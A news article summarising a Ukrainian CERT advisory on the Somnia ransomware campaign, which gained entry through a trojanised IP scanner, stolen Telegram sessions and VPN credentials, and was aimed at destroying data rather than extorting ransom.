Ukrainian cyber-experts have discovered a new attack campaign by suspected Russian threat actors that compromises victims’ VPN accounts to access and encrypt networked resources.
The country’s Computer Emergency Response Team (CERT) noted in a new statement that the so-called Somnia ransomware was being used by the FRwL (aka Z-Team), also identified as UAC-0118.
Initial compromise is achieved by tricking victims into downloading “Advanced IP Scanner” software which actually contains Vidar malware. CERTU-UA believes this was achieved by initial access brokers (IABs) working for the Russians.
“It should be noted that the Vidar stealer, among other things, steals Telegram session data, which, in the absence of configured two-factor authentication and a passcode, allows unauthorized access to the victim's account,” the statement continued.
“As it turned out, the victim's Telegram was used to transfer VPN connection configuration files (including certificates and authentication data) to users. Given the lack of two-factor authentication when establishing a VPN connection, attackers were able to gain an unauthorized connection to the corporate network.”
Once inside, attackers conducted reconnaissance work using the Netscan tool and then launched Cobalt Strike Beacon, exfiltrating data using the Rclone program. There are also signs of the threat actors using Anydesk and Ngrok at this stage.
It’s unclear how widespread the campaign was, although “several” Ukrainian organizations are thought to have been impacted since spring 2022.
Most pointedly, CERT-UA confirmed that the end goal is not to generate profits from a ransom but to destroy victim environments.
“Note that the Somnia malware has also undergone changes. The first version of the program used the symmetric 3DES algorithm. In the second version, the AES algorithm is implemented,” it concluded.
“At the same time, taking into account the dynamics of the key and the initialization vector, this version of Somnia, according to the attackers’ theoretical plan, does not provide for the possibility of data decryption.”